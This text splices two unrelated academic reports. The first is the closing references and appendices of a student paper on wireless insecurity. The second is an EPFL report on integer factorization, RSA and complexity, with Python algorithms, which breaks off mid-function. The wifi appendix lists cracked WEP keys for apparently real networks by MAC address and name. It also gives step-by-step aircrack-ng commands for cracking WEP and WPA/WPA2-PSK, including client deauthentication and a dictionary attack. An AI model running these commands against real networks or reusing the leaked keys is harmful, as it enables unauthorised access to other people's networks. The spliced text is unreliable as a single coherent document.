2) Borisov, N., Goldberg, I., Wagner, D. (n.d.). Intercepting Mobile Communications: The
Insecurity of 802.11. Retrieved 30 October 2011, from
http://www.isaac.cs.berkeley.edu/isaac/mobicom.pdf
3) Aircrack-ng. Retrieved from http://www.aircrack-ng.org/
4) Infocomm Development Authority of Singapore. (2006). Singapore: A World Class
e-Government. Retrieved 30 October 2011, from
http://www.ida.gov.sg/doc/Infocomm%20Industry/Infocomm_Industry_Level1/Gov%20Brochure.pdf
5) Lee, M. K. (2007, July 27). Malaysian Govt bans camera phones. Retrieved 30 October 2011,
from http://www.zdnetasia.com/malaysian-govt-bans-camera-phones-62029540.htm
6) Munir, K. (2003, September 13). Jamming device aims at camera phones. Retrieved 30 October
2011, from http://www.zdnetasia.com/jamming-device-aims-at-camera-phones39150860.htm
7) Bob, B. (2008, November 21). Defense bans use of removable storage devices. Retrieved 30
October 2011, from http://www.nextgov.com/nextgov/ng_20081121_2238.php
8) Joanne, R. (2008, May 15). Wired vs Wireless: Sometimes There's No Substitute for a Cable.
Retrieved 30 October 2011, from
http://www.osnews.com/story/19748/Wired_vs_Wireless_Sometimes_There_s_No_Substitute_for_a_Cable/page2/Asd
9) Borys, P. (2001, February). Tempest. Retrieved 30 October 2011, from
http://searchsecurity.techtarget.com/definition/Tempest
10) U.S. Army Corps of Engineers, Publication Department. (1990, December 31).
Electromagnetic Pulse (EMP) and Tempest Protection for Facilities. Retrieved 30 October 2011,
from http://cryptome.org/emp08.htm
Appendix A
Table 1 – Found keys of WEP networks

BSSID              ESSID        CHANNEL  KEY FOUND
00:1A:70:95:6A:C6  ruiqi        11       18:06:19:81:88
00:C0:CA:1D:51:D4  WLAN-11g-AP  1        64:69:76:65:72
00:1F:B3:63:46:89  2WIRE092     6        21:53:38:13:27
00:16:B6:33:9A:B0  hairi        6        93:80:83:14:00
00:23:51:AB:40:71  2WIRE687     6        84:39:27:86:29
Table 2 – Detailed steps for cracking a WEP wireless network

Step  Function                                    Commands
1     Enable wifi monitor mode                    sudo airmon-ng start wlan1
2     Start network sniffing to select            sudo airodump-ng mon0
      target AP
3     Monitor specific network                    sudo airodump-ng -c <CHANNEL> --bssid <MAC ADDRESS>
                                                  -w <FILE-NAME> mon0
4     Fake authentication (optional, if there     sudo aireplay-ng -1 6000 -o 1 -q 10 -e <ESSID>
      is no available host connecting to AP)      -a <BSSID> -h <fake BSSID> --ignore-negative-one mon0
5     ARP request replay attack                   sudo aireplay-ng -3 -b <BSSID> -h <HOST / FAKE BSSID>
                                                  --ignore-negative-one mon0
6     Retrieve passphrase from the IVs            sudo aircrack-ng -b 00:1A:70:95:6A:C6 ruqi-01.cap
      collected
7     Decrypting and viewing the whole            sudo airdecap-ng -w <passphrase key> <captured network
      network exchange with AP                    file name, e.g. "2WIRE687-01.cap"> (decrypting)
                                                  sudo tcpdump -r <decrypted network file name> -i mon0
                                                  (viewing)
Table 3 – Detailed steps for cracking a (WPA/WPA2)-PSK wireless network

Step  Function                                    Commands
1     Enable wifi monitor mode                    sudo airmon-ng start wlan1
2     Start network sniffing to select            sudo airodump-ng mon0
      target AP
3     Collect the 4-way authentication            sudo airodump-ng -c 6 --bssid <BSSID>
      handshake for the targeted AP               -w <file name to be saved> mon0
4     Deauthenticate a client who is already      sudo aireplay-ng -0 500 -a <AP MAC ADDRESS>
      connected to the AP (to force a new         -c <Client MAC ADDRESS> --ignore-negative-one mon0
      handshake)
5     Check if the handshake has been captured    sudo aircrack-ng <file name>
6     Dictionary attack on the captured           sudo aircrack-ng -w password.lst -b <AP MAC ADDRESS>
      handshake file                              <file name>
Appendix B
Figure 1 – List of available wireless networks (Location A)
Figure 2 – List of available wireless networks (Location B)
Figure 3 – Aircrack-ng on WEP for the ruiqi network
Figure 4 – Plaintext (decrypted) packets for the ruiqi network
Figure 5 – Aircrack-ng on WEP for the WLAN-11g-AP network
Figure 6 – Aircrack-ng on WEP for the 2WIRE092 network
Figure 7 – Aircrack-ng on WEP for the 2WIRE687 network
Figure 8 – Aircrack-ng on WEP for the hairi network
Figure 9 – Plaintext (decrypted) packets for the hairi network
Figure 10 – WPA-PSK 4-way handshake monitoring for the Remyidah network
Figure 11 – Dictionary attack on the obtained handshake for the Remyidah network
Figure 12 – WPA-PSK 4-way handshake and dictionary attack for the Linksys network
Figure 13 – Router homepage for the 2WIRE687 network
Figure 14 – Router homepage for the hairi network
Figure 15 – Router's firewall for the hairi network
Appendix C
Figure 16 – Survey Response 1
Figure 17 – Survey Response 2
Figure 18 – Survey Response 3
Figure 19 – Survey Response 4
Figure 20 – Survey Response 5
Figure 21 – Survey Response 6
Figure 22 – Survey Response 7
Figure 23 – Survey Response 8
Figure 24 – Survey Response 9
Figure 25 – Survey Response 10
Figure 26 – Survey Response 11
Figure 27 – Survey Response 12
Figure 28 – Survey Response 13
Figure 29 – Survey Response 14
Figure 30 – Survey Response 15
Figure 31 – Survey Response 16
Figure 32 – Survey Response 17
Figure 33 – Survey Result 1
Figure 34 – Survey Result 2
Figure 35 – Survey Result 3
Figure 36 – Survey Result 4
Figure 37 – Survey Result 5
Integer Factorization
Romain Edelmann [email protected],
Jean Gauthier [email protected], and
Fabien Schmitt [email protected]
École Polytechnique Fédérale de Lausanne
Abstract. In this report, we discuss the factorization of integers, a major problem
closely related to cryptography and arithmetic, starting with a brief history of the
subject and the necessary mathematical background. We then discuss the motivation
behind factoring numbers. The problem is next analyzed within complexity theory in
terms of feasibility and complexity. Finally, various algorithms are presented, some
of them implemented in Python.
Keywords. Integer factorization, prime factors, cryptography, public
key systems, RSA, complexity theory, algorithm, Fermat’s factorization
method, Pollard’s factorization method, Shor’s algorithm.
1 Introduction
Integer factorization is the decomposition of a number into its prime divisors. As
we shall see throughout this report, this problem is very important in a number of
fields, including cryptography. The problem might seem easy to solve at first, but
in fact it gets much harder as numbers get big.
2 History
Integer factorization and prime numbers are closely related subjects and have been
studied for a very long time [1].
In Ancient Greece, Euclid already studied prime numbers and demonstrated some of
their fundamental laws, such as the infinitude of primes and the fundamental theorem
of arithmetic. Prime numbers were also taught in Pythagoras's school, and
Eratosthenes tried to find some of their principles.
Later, in 1640, the French mathematician Pierre de Fermat developed what is now
known as Fermat's little theorem, although without proving it. Less than a hundred
years later, Leibniz and Euler proved it. Euler also developed many functions and
theorems in number theory, such as Euler's totient theorem, which is a
generalization of Fermat's little theorem.
Finding prime numbers remained hard, but at the beginning of the 19th century, Gauss
found a formula describing the asymptotic density of the prime numbers. Other
mathematicians tried to create tests to determine whether an integer is prime,
including Lucas, who created his test in 1876 and found the greatest prime number
ever discovered without a computer. His test was improved by Lehmer in 1930 and is
still in use nowadays.
In the 1970s, with the expansion of networks, scientists finally found a practical
application for prime numbers: public key cryptography. Until then, all encryption
had been symmetric. In 1976, Diffie and Hellman invented the first public key
scheme, followed by Ronald Rivest, Adi Shamir and Leonard Adleman, who in 1978
invented a new public key cryptosystem named after them: RSA. Based on the
properties of prime numbers and on factorization, RSA is still widely used
nowadays [2].
3 Important Mathematical Properties
Before proceeding to the rest of the report, it is important to review some of the
mathematical properties used in integer factorization. This section collects
theorems and definitions that are used throughout this paper. Since the vast
majority of the subsequent propositions are well-known results from basic algebra
and number theory that can be found in any good algebra or mathematics book [3][4],
the proofs have not been included in this section. The theorems are hence formulated
as propositions.
Definition 1. If a and b are integers, a ≠ 0, then a divides b if there is an
integer c such that a · c = b. This is written a | b. In this case, a is a factor of
b and b a multiple of a. If a does not divide b, we write a ∤ b.
Definition 2. A positive integer p greater than 1 is called prime if the only
positive factors of p are 1 and p.
Definition 3. If a positive integer greater than 1 is not prime, it is called
composite.
Definition 4. The largest integer g such that g|m and g|n, where m and n are
both nonzero, is called greatest common divisor of m and n and is denoted
by gcd(m, n).
Definition 5. If a number m is such that gcd(m, n) = 1 for a given n, then m
is said to be coprime or relatively prime to n.
Proposition 1 (Fundamental Theorem of Arithmetic). Every positive integer greater than 1 can be written as a prime or a product of primes in a unique
way, up to the order of its factors.
Proposition 2. Let n be a composite integer. Then n has a prime divisor less than or
equal to √n.
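Proposition 2 directly suggests the simplest factorization algorithm, trial
division, which tests candidate divisors only up to √n. The following Python sketch
is our own illustration (the function name is ours), not one of the paper's
implementations:

```python
def trial_division(n):
    """Return the prime factorization of n as a list of primes.

    By Proposition 2, any composite n has a prime divisor <= sqrt(n),
    so it suffices to test candidate divisors d while d * d <= n.
    """
    factors = []
    d = 2
    while d * d <= n:
        while n % d == 0:   # divide out each prime factor completely
            factors.append(d)
            n //= d
        d += 1
    if n > 1:               # whatever remains is itself prime
        factors.append(n)
    return factors
```

For example, `trial_division(84)` yields `[2, 2, 3, 7]`, in agreement with the
fundamental theorem of arithmetic (Proposition 1).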
Definition 6. Two integers a and b are congruent modulo n if n | (a − b). Formally,
this is written a ≡ b mod n. If a and b are not congruent modulo n, we write
a ≢ b mod n.
Definition 7. An integer a⁻¹ which satisfies the congruence relation
a · a⁻¹ ≡ 1 mod m is called the modular multiplicative inverse modulo m, or simply
the inverse of a. a⁻¹ exists if and only if gcd(a, m) = 1.
Proposition 3 (Bézout's identity). For all nonzero integers a and b, there exist two
integers x and y such that:
ax + by = gcd(a, b).
(1)
Proposition 4 (Euclidean algorithm). After the following steps, r_{k+1} is
gcd(a, b):
r_0 := a, r_1 := b
(2)
r_0 = q_0 · r_1 + r_2
(3)
r_1 = q_1 · r_2 + r_3
(4)
...
r_{k−1} = q_{k−1} · r_k + r_{k+1}
(5)
r_k = q_k · r_{k+1}
(6)
Proposition 5 (Extended Euclidean Algorithm). The following substitutions solve
Bézout's identity, using the computations done in Euclid's algorithm. Furthermore,
x is the multiplicative inverse of a mod b:
r_{k+1} = r_{k−1} − q_{k−1} · r_k
(7)
r_{k+1} = r_{k−1} − q_{k−1} · (r_{k−2} − q_{k−2} · r_{k−1})
(8)
r_{k+1} = −q_{k−1} · r_{k−2} + (1 + q_{k−1} · q_{k−2}) · r_{k−1}
(9)
...
r_{k+1} = x · a + y · b
(10)
At each step, the r_i with the highest index on the right-hand side of the equation
is substituted using the equation r_{i−2} = q_{i−2} · r_{i−1} + r_i. The computation
stops when r_{k+1} is expressed as a linear combination of a and b.
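Propositions 4 and 5 translate directly into code. The sketch below is our own
illustration (function names are ours): an iterative extended Euclidean algorithm
returning gcd(a, b) together with the Bézout coefficients, then used to compute the
modular inverse of Definition 7.

```python
def extended_gcd(a, b):
    """Return (g, x, y) such that a*x + b*y = g = gcd(a, b) (Bezout's identity)."""
    x0, y0, x1, y1 = 1, 0, 0, 1
    while b != 0:
        # One step of Euclid's algorithm: r_{i} = r_{i-2} - q_{i-2} * r_{i-1},
        # while carrying the Bezout coefficients along.
        q, a, b = a // b, b, a % b
        x0, x1 = x1, x0 - q * x1
        y0, y1 = y1, y0 - q * y1
    return a, x0, y0

def mod_inverse(a, m):
    """Return a^-1 mod m, which exists iff gcd(a, m) = 1 (Definition 7)."""
    g, x, _ = extended_gcd(a, m)
    if g != 1:
        raise ValueError("a is not invertible modulo m")
    return x % m
```

For instance, `extended_gcd(240, 46)` returns `(2, -9, 47)`, and indeed
240 · (−9) + 46 · 47 = 2 = gcd(240, 46).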
Definition 8 (Euler's Phi Function). The function ϕ(n), defined as the number of
positive integers less than or equal to n that are coprime to n, is called the
totient or Euler's phi function of n.
ϕ(n) = n · ∏_{p|n} (1 − 1/p)
(11)
where p ranges over all the prime factors of n.
Corollary 1. If p and q are primes, then ϕ(p · q) = (p − 1) · (q − 1).
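Definition 8 and Corollary 1 can be checked with a small Python routine. This is an
illustrative sketch of ours (the function name is not from the paper) that evaluates
the product formula while factoring n by trial division:

```python
def euler_phi(n):
    """Euler's phi function, via the product formula over the prime factors of n."""
    result = n
    p = 2
    while p * p <= n:
        if n % p == 0:
            while n % p == 0:   # strip the factor p entirely
                n //= p
            result -= result // p   # multiply result by (1 - 1/p)
        p += 1
    if n > 1:                   # one prime factor remains
        result -= result // n
    return result
```

For two primes, e.g. `euler_phi(7 * 11)`, the result is (7 − 1) · (11 − 1) = 60, as
Corollary 1 states.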
Proposition 6 (Fermat's little theorem). If p is prime, then for any integer a, we
have a^p ≡ a mod p. Alternatively, if gcd(a, p) = 1, then a^(p−1) ≡ 1 mod p.
Proposition 7 (Euler's theorem). If n and a are coprime integers, then
a^ϕ(n) ≡ 1 mod n. This theorem is a generalization of Fermat's little theorem.
Proposition 8. Every odd integer can be written as a difference of two perfect
squares. Furthermore, if l · m is a factorization of n, then
n = ((l + m)/2)² − ((l − m)/2)² is such a difference.
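Proposition 8 is the basis of Fermat's factorization method, listed among this
report's keywords: starting from x = ⌈√n⌉, search for an x such that x² − n is a
perfect square y²; then n = (x − y)(x + y) with l = x + y and m = x − y. A minimal
Python sketch of ours:

```python
from math import isqrt

def fermat_factor(n):
    """Factor an odd n by finding x with x*x - n a perfect square.

    If x*x - n == y*y, then n = (x - y) * (x + y), matching Proposition 8.
    Works best when the two factors of n are close to each other.
    """
    assert n % 2 == 1, "n must be odd"
    x = isqrt(n)
    if x * x < n:       # start at the ceiling of sqrt(n)
        x += 1
    while True:
        y2 = x * x - n
        y = isqrt(y2)
        if y * y == y2:             # x*x - n is a perfect square
            return x - y, x + y
        x += 1
```

For example, `fermat_factor(5959)` returns `(59, 101)` after only three candidate
values of x.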
4 Motivation
Prime factorization is widely used in the scientific world: in cryptography, of
course, but also in algorithmics and image processing. Every number has a unique
prime factorization, and knowing the prime factors of two or more numbers allows one
to quickly discover their greatest common divisor, least common multiple or square
root. Based on this property, much research is still in progress to compute prime
factorizations faster [5].
4.1 Cryptography
Factorization of Large Integers If we have two big prime numbers, it is really easy
to obtain their product. But from this product, it is practically impossible to find
the prime factorization [6]. This problem is the basis of today's public key
cryptography [7], widely used in network security.
Public Key Cryptography The main principle of public key cryptography is to create a
function that is easy to compute but hard to invert. Anyone who wants to send you a
secret message can then encrypt it with your public key, which is accessible to
everyone on the network. But without the private key, which remains secret to
everybody but you, it is almost impossible to decrypt the message [7].
The Example of RSA (Rivest Shamir Adleman) One of the most widely used cryptosystems
on the Internet is RSA [7]. This public key cryptosystem is based on the difficulty
of finding the two prime factors of a huge number. Let us take the case of Bob, who
wants to send a message to Alice without anyone but Alice being able to read it.
First of all, let us see how Alice creates her public and private keys.
– Alice chooses two big prime numbers, p and q, that she keeps private. She then
computes their product n = p · q.
– Alice now computes Euler's phi function of n:
ϕ(n) = (p − 1) · (q − 1)
(12)
One of the key things to understand is that Alice can very easily calculate this
function because, unlike anybody else, she knows p and q, the prime factors of n.
– Then Alice chooses a number e relatively prime to ϕ(n) and calculates its inverse
d modulo ϕ(n):
d ≡ e⁻¹ mod ϕ(n)
(13)
To compute this d, Alice can use the Extended Euclidean Algorithm.
– Alice now publishes the pair (n, e) as her public key, and keeps d secret.
If Bob wants to confidentially send a message M to Alice, he can use Alice's public
key to perform the following computation:
E ≡ M^e mod n
(14)
and then send the computed ciphertext E to Alice. When she receives the ciphertext,
Alice can retrieve the original message by performing the following computation:
M ≡ E^d mod n
(15)
The fact that M is recovered from this computation follows from Euler's Theorem.
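The key generation, encryption and decryption steps above can be condensed into a
few lines of Python. This is a toy sketch of ours, with deliberately tiny primes and
function names of our own choosing; real RSA uses primes hundreds of digits long.
Note that `pow(e, -1, phi)` computes the modular inverse (available since Python
3.8), standing in for the Extended Euclidean Algorithm.

```python
def make_keys(p, q, e):
    """RSA key generation from two primes p, q and a public exponent e."""
    n = p * q
    phi = (p - 1) * (q - 1)    # Corollary 1
    d = pow(e, -1, phi)        # d = e^-1 mod phi(n), equation (13)
    return (n, e), d           # public key (n, e), private key d

def encrypt(m, public_key):
    n, e = public_key
    return pow(m, e, n)        # E = M^e mod n, equation (14)

def decrypt(c, d, n):
    return pow(c, d, n)        # M = E^d mod n, equation (15), by Euler's theorem

# Toy example: Alice picks p = 61, q = 53, e = 17.
public, private = make_keys(61, 53, 17)
cipher = encrypt(42, public)
assert decrypt(cipher, private, public[0]) == 42
```

With these toy values, n = 3233, ϕ(n) = 3120 and d = 2753; the round trip recovers
M = 42 exactly.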
Attack Using Integer Factorization Let us now imagine that a hacker, named Trudy,
was able to read the encrypted messages from Bob to Alice. What Trudy knows is the
following:
– The public key of Alice, that is to say n and e.
– The ciphertext E.
The only thing that prevents Trudy from decrypting the ciphertext is that she is not
able to compute Euler's phi function of n. If a fast way to decompose n into its
prime factors p and q were known to Trudy, she could very easily compute ϕ(n) and d
in exactly the same way Alice did, and therefore decrypt E back to the original
message M. Herein lies the principal motivation behind integer factorization.
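Trudy's attack can likewise be sketched in a few lines of Python (ours, with
hypothetical names): once n is factored, everything else follows exactly as in
Alice's own computation. The naive factoring step below is what makes the attack
infeasible for realistic key sizes.

```python
def crack_rsa(n, e, ciphertext):
    """Recover the plaintext from the public key (n, e) alone, by factoring n.

    Trial division is hopeless for realistically sized n, which is
    exactly why RSA is considered secure.
    """
    p = 2
    while n % p != 0:          # find the smaller prime factor of n
        p += 1
    q = n // p
    phi = (p - 1) * (q - 1)    # now Trudy can compute phi(n)...
    d = pow(e, -1, phi)        # ...and d, just as Alice did
    return pow(ciphertext, d, n)

# Toy keys from above: n = 61 * 53 = 3233, e = 17; Bob sent M = 42 encrypted.
assert crack_rsa(3233, 17, pow(42, 17, 3233)) == 42
```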
5 Theoretical Computer Science Approach
In order to analyze integer factorization more formally in terms of feasibility and
complexity, we need to briefly introduce complexity theory. This section is intended
as a very short introduction to this theory. It is a wide area of study, and readers
interested in the subject can refer to various authoritative books, such as
Introduction to the Theory of Computation by M. Sipser [8], which is the reference
book used throughout this chapter.
5.1 Complexity Theory
Complexity theory is an area of the theory of computation concerned with classifying
problems according to how difficult it is to compute a solution for them. Some
problems are easy, like sorting a list of integers, and some are hard, like deciding
whether or not the free variables in a boolean formula can be assigned so that the
formula evaluates to true.
Complexity theory plays a central role in modern cryptography. Many ciphers nowadays
rely on the computational difficulty of decrypting a message without the key.
The following subsections are a short introduction to complexity theory.
5.2 Problems
A problem can be described formally as a question in some formal language
about some input. One kind of problem, which is easier to reason about, is
the decision problem: the answer to a decision problem, given a certain input,
is always YES or NO. For example, the question "Is n prime?", with n an input
number, is a decision problem called PRIME. Another kind of problem, the
function problem, does not have its output limited to YES or NO.
5.3 Turing Machines
A Turing machine is an abstract model of a computer, first introduced by Alan
Turing in 1936. Anything a computer can compute, a Turing machine can compute
as well. It consists of an infinite tape serving as memory and a read-write head
moving left or right on the tape.
To control this, the abstract machine has a finite number of states and a
transition function which, given a state and the symbol under the head,
returns three instructions: a new state, a symbol to replace the read symbol
on the tape, and where to move the head, left or right.
The machine contains three special states. The first one is the initial state,
which is, unsurprisingly, the state in which the machine starts. The other two
are an accepting state and a rejecting state; when the machine reaches either
of these states, it stops.
The input given to the machine is placed on the tape before any computation
is made.
Textual Description of Turing Machines. Giving such a precise description
of a Turing machine is unwieldy, due to all the details. For the rest of the
report, when we need to describe a Turing machine, we will give only a
higher-level textual description of what it does. Given such a description, it
is possible to convert it into the formal form we have just described.
Language of a Turing Machine. The language of a Turing machine is defined
as the set of all inputs on which the machine will accept, that is to say all the
strings of symbols which would lead the Turing machine to the accepting state.
Non-deterministic Turing Machines. A non-deterministic Turing machine
is much like a normal Turing machine, except for the transition function. Instead
of giving just one set of the three instructions (new state, new symbol and
direction), it can give many of them. The machine can be seen as making the
non-deterministic choice of which one to execute in order to, if possible, reach
the accepting state.
5.4 Complexity Classes
The complexity classes are a way to classify problems in terms of difficulty of
computation. In order to classify a problem, one needs to find a corresponding
Turing machine whose language is the set of solutions to the problem, encoded in
some alphabet. If we take a look at the PRIME problem, we can find a Turing
machine, which we will call Prime, that accepts exactly the binary
representations of prime numbers.
The P Class. Two classes that are very important in practice are the famous P
and NP classes. A problem is in P if it is possible to find a Turing machine that
accepts all the solutions to the problem and rejects all the others, in polynomial
time. By polynomial time, it is meant that the time of computation is bounded
by a polynomial in the size of the input.
Intuitively, the problems feasibly computable on a computer are the ones in P,
such as sorting a list of integers or computing the greatest common divisor
of two numbers. This is known as the Cobham thesis [9].
The problem of deciding whether a number is prime was proven to be in P in
2004 [10].
The NP Class. The NP class is the same as P, except that the deterministic
Turing machines are replaced by non-deterministic ones. All problems in P are
naturally also in NP. It is not known whether there exist problems that are in
NP but not in P; this is the famous P = NP question.
One can prove that a problem is in NP by verifying a given certificate along
with the input. We will use that method later on to prove that the factorization
problem is in NP.
NP-Complete Problems. A certain subset of NP is known as the NP-complete
problems. Any NP problem can be reduced, with only polynomial overhead, to any
NP-complete problem. This means that if one can find a Turing machine, or an
algorithm, that solves any one of the NP-complete problems in polynomial time,
we obtain a feasible way to compute every problem in NP.
5.5 The Integer Factorization Problems
Integer factorization can be stated as a function problem: given any integer,
a unique output, the list of its prime factors, is expected. But this problem
is equivalent to the following decision problem: given two integers n and k,
is there an integer m such that 1 < m < k and m divides n?
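The two formulations are equivalent in a constructive sense: repeated calls to the decision problem recover an explicit factor. The sketch below (with illustrative names of our own) binary-searches for the smallest non-trivial factor using only YES/NO answers; the oracle itself is implemented by brute force purely for demonstration.

```python
def has_factor_below(n, k):
    # Decision oracle: is there an m with 1 < m < k and m | n?
    # Brute force here purely for illustration.
    return any(n % m == 0 for m in range(2, k))

def smallest_factor(n):
    # Binary search for the smallest k with a YES answer; the smallest
    # non-trivial factor of n (or n itself, when n is prime) is then k - 1.
    lo, hi = 3, n + 1
    while lo < hi:
        mid = (lo + hi) // 2
        if has_factor_below(n, mid):
            hi = mid
        else:
            lo = mid + 1
    return lo - 1
```

For n = 91 the search converges on k = 8, recovering the factor 7; calling the routine repeatedly on the quotient would yield the full factorization.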
5.6 Integer Factorization in NP
The integer factorization problem falls in NP, the class of problems solvable in
polynomial time by a non-deterministic Turing machine. As stated earlier, a
problem is in NP if and only if a certificate, or solution, can be verified in
polynomial time on a deterministic Turing machine. This is the fact used in the
following proof.
It is also important to keep in mind that the complexity is calculated from
the input length. If a number n is to be passed to the machine, it first needs to
be encoded in a given alphabet. The size of the input is of the order of log(n)
for a number n.
Proof. For the proof, we will simply define a Turing machine that verifies a
solution of the factorization of n, with p1 to pk being the supposed prime
factors of n.

FactorVerifier(<n, p1, p2, ..., pk>)
Begin
    acc := 1
    For f := p1, p2, ..., pk:
        If Prime(f) rejects, REJECT
        acc := acc * f
    If acc = n:
        ACCEPT
    Else:
        REJECT
End
This deterministic Turing machine verifies in polynomial time that n is indeed
the product of the primes p1 to pk. It uses another Turing machine, Prime, to
test in polynomial time whether a number is prime; as stated earlier, PRIME
is in P.
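The verifier above translates directly to Python. In the sketch below (function names our own), trial division stands in for the Prime machine purely for illustration; the formal argument would use a genuinely polynomial-time test such as AKS.

```python
def is_prime(f):
    # Stand-in for the Prime machine; trial division is used only for
    # illustration (a true polynomial-time test such as AKS exists).
    if f < 2:
        return False
    i = 2
    while i * i <= f:
        if f % i == 0:
            return False
        i += 1
    return True

def factor_verifier(n, certificate):
    # Accept iff the certificate lists primes whose product is exactly n.
    acc = 1
    for f in certificate:
        if not is_prime(f):
            return False  # REJECT: a claimed factor is not prime
        acc *= f
    return acc == n       # ACCEPT iff the product equals n
```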
5.7 Relation to Other Complexity Classes
It is widely believed that this problem is not NP-complete; however, no proof
of this has been given so far. The question is closely related to the P = NP
question, which has never been proven or disproven.
As an NP problem, we do not know whether a polynomial-time algorithm exists
to solve integer factorization. But finding a polynomial-time algorithm that
solves any of the NP-complete problems would mean that integer factorization
is also feasible in polynomial time, and would greatly compromise the security
of public key cryptography systems!
6 Algorithms for Integer Factorization
6.1 Big O Notation
When discussing the complexity of algorithms, we will use the Landau notation,
known as the Big O notation:
f(n) ∈ O(g(n)) ⟺ ∃k > 0, ∃m ∈ ℕ : ∀n > m, f(n) ≤ k · g(n)    (16)
What this means is that if f(n) ∈ O(g(n)), then f(n) does not grow faster than
g(n); in other words, f(n) is bounded above by a constant multiple of g(n).
6.2 Trivial Factorization Algorithm
Core Ideas. This algorithm is the most naive method to factorize an integer n
into a product of primes. Starting at i = 2, we test whether i | n. If it does,
we divide n by i and repeat this step. If it does not, we increment i until it
reaches ⌊√n⌋. This algorithm is deterministic and proves whether n is prime or
not: if the only returned factor is n, then n is prime. Otherwise, n is composite
and the list of its factors is returned.
Implementation in Python.

from math import floor, sqrt

def trivialFactorization(n):
    factors = []
    ncurr = n
    for i in range(2, floor(sqrt(n)) + 1):  # test every candidate up to floor(sqrt(n))
        while ncurr % i == 0:
            factors.append(i)
            ncurr //= i
    if ncurr > 1:  # whatever remains is a prime factor larger than sqrt(n)
        factors.append(int(ncurr))
    return factors
Running Time. In the worst case, n is prime and its only factors are 1 and n.
Hence, the algorithm will perform O(√n) divisions, since every integer up to √n
is tested. Each division can be performed in O(log(n)) [11]. This leads to the
overall worst-case complexity O(√n log(n)). When considering the number of bits
m of n, the running time is O(m · 2^(m/2)). While this running time is acceptable
for small numbers or integers with small factors, the algorithm becomes totally
impractical when trying to factor a large number with large prime factors.
Improvements. There is no need to check every integer up to √n. A first
improvement would be to leave out all even numbers after having repeatedly
divided n by 2. We can further improve the algorithm by using the sieve of
Eratosthenes, since we need only consider prime factors.
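The first of these improvements can be sketched as follows (our own illustrative code, not from the original report): divide out the factor 2 first, then test only odd candidates, halving the number of trial divisions.

```python
from math import isqrt

def improved_trivial_factorization(n):
    # Divide out all factors of 2 first, then test odd candidates only.
    factors = []
    while n % 2 == 0:
        factors.append(2)
        n //= 2
    i = 3
    while i <= isqrt(n):
        while n % i == 0:
            factors.append(i)
            n //= i
        i += 2
    if n > 1:  # leftover prime factor larger than sqrt(n)
        factors.append(n)
    return factors
```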
6.3 Fermat's Factorization Algorithm
Core Ideas. Fermat's factorization is based on the fact that every odd integer
can be written as a difference of two perfect squares. The algorithm starts by
factoring out all factors equal to 2. Then, an odd integer is left for factoring
and Fermat's method can be applied. The algorithm cycles through values of x,
starting at ⌈√n⌉, and checks whether x² − n = y² is a perfect square. If it is
the case, two factors of n have been found, namely x + y and x − y. By applying
this method recursively to the two factors, the decomposition of n into a
product of primes can be achieved.
Implementation in Python.

from math import ceil, sqrt

def fermatFactorization(n):
    def fermatFactor(n):
        # search for x such that x^2 - n is a perfect square y^2
        x = ceil(sqrt(n))
        y2 = x**2 - n
        while round(sqrt(y2))**2 != y2:
            x += 1
            y2 = x**2 - n
        return int(x - sqrt(y2))  # the factor x - y
    factors = []
    while n % 2 == 0:
        factors.append(2)
        n //= 2
    if n == 1:  # n was a power of two
        return factors
    cfactor = fermatFactor(n)
    if cfactor != 1:
        factors.extend(fermatFactorization(cfactor))
        factors.extend(fermatFactorization(n // cfactor))
    else:
        factors.append(int(n))
    return factors
Running Time. Fermat's method is very effective when the factors to be found
are close to √n. In the worst case however, when n is prime, the algorithm is
even worse than the trivial algorithm, since O(n − √n) = O(n) steps are needed.
Expressed in terms of n's size in bits m, the running time is O(2^m).
Improvements. Several simple improvements can be added to the algorithm in
order to reduce its running time. The most straightforward one combines
Fermat's algorithm with the trivial method. It sets a threshold t > √n, uses
Fermat's method on ⌈√n⌉ ≤ x ≤ t, and the trivial algorithm afterwards, knowing
that only factors smaller than x − y have to be tested. Other improvements
include a sieve method where not all values of x are tried in the equation
x² − n = y² [12]. Fermat's factorization method has been used as a basis for
modern factorization algorithms, such as the quadratic sieve and the general
number field sieve.
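The combined improvement can be sketched as follows (our own illustrative code; `combined_factor` and the threshold parameter `t` are assumed names, and n is assumed odd after the powers of 2 have been removed). If Fermat's scan fails for every x up to t, any factor a = x − y must be smaller than t − √(t² − n), so a short trial division finishes the job.

```python
from math import isqrt

def combined_factor(n, t):
    # Fermat's scan for x in [ceil(sqrt(n)), t].
    x = isqrt(n)
    if x * x < n:
        x += 1
    while x <= t:
        y2 = x * x - n
        y = isqrt(y2)
        if y * y == y2:
            return x - y, x + y  # factors found by Fermat's method
        x += 1
    # Fermat failed up to t: any factor is smaller than t - sqrt(t^2 - n),
    # so only a short trial division remains.
    bound = t - isqrt(t * t - n)
    for d in range(3, bound + 1, 2):
        if n % d == 0:
            return d, n // d
    return 1, n  # no non-trivial factor found: n is prime
```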
6.4 Pollard's ρ Algorithm
Core Ideas. The main idea in Pollard's ρ algorithm is to generate two
pseudo-random numbers (0 ≤ x, y < n) by using a cyclic function, and hope that
their difference shares a non-trivial common divisor with n. The key observation
is that, according to the birthday paradox, only 1.18 · √n numbers have to be
tested before finding a potential factor of n with a probability of 0.5. This
algorithm may fail to find factors for a composite n. This happens because the
image of the random function may not cover the whole interval [0, n[. In that
case, the algorithm is repeated with another function than the usual
f(x) = x² + 1.    (17)
It also has to be noted that the algorithm fails on prime numbers, since
gcd(|x − y|, n) is always equal to 1 in that case.
Implementation in Python.

def pollardFactorization(n):
    f = lambda x: (x**2 + 1) % n  # values are reduced modulo n
    def gcd(a, b):
        if b == 0:
            return a
        else:
            return gcd(b, a % b)
    def pollardFactor(n):
        # Floyd cycle detection: x advances one step, y two steps
        x = 2
        y = 2
        z = 1
        while z == 1:
            x = f(x)
            y = f(f(y))
            z = gcd(abs(x - y), n)
        return int(z)
    m = pollardFactor(n)
    n = int(n / m)
    return [m, n]
Running Time. Pollard's ρ algorithm has an expected running time and standard
deviation of O(√n), or O(2^(m/2)) where m is the number of bits in n, when a
random mapping function is used [13].
Improvements. Several improvements to this factorization algorithm have been
proposed over the years. They include different methods for cycle detection
and not computing z at every iteration [14].
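The second improvement can be sketched as follows (our own illustrative code, with assumed names): instead of one gcd per step, the differences |x − y| are multiplied together modulo n and a single gcd is taken per batch, falling back to a step-by-step replay when the batched gcd overshoots.

```python
from math import gcd

def pollard_rho_batched(n, batch=64):
    # Multiply the differences |x - y| together modulo n and take a single
    # gcd per batch of iterations, instead of one gcd per step.
    f = lambda x: (x * x + 1) % n
    x = y = 2
    while True:
        xs, ys = x, y  # remember the batch start in case we must replay
        prod = 1
        for _ in range(batch):
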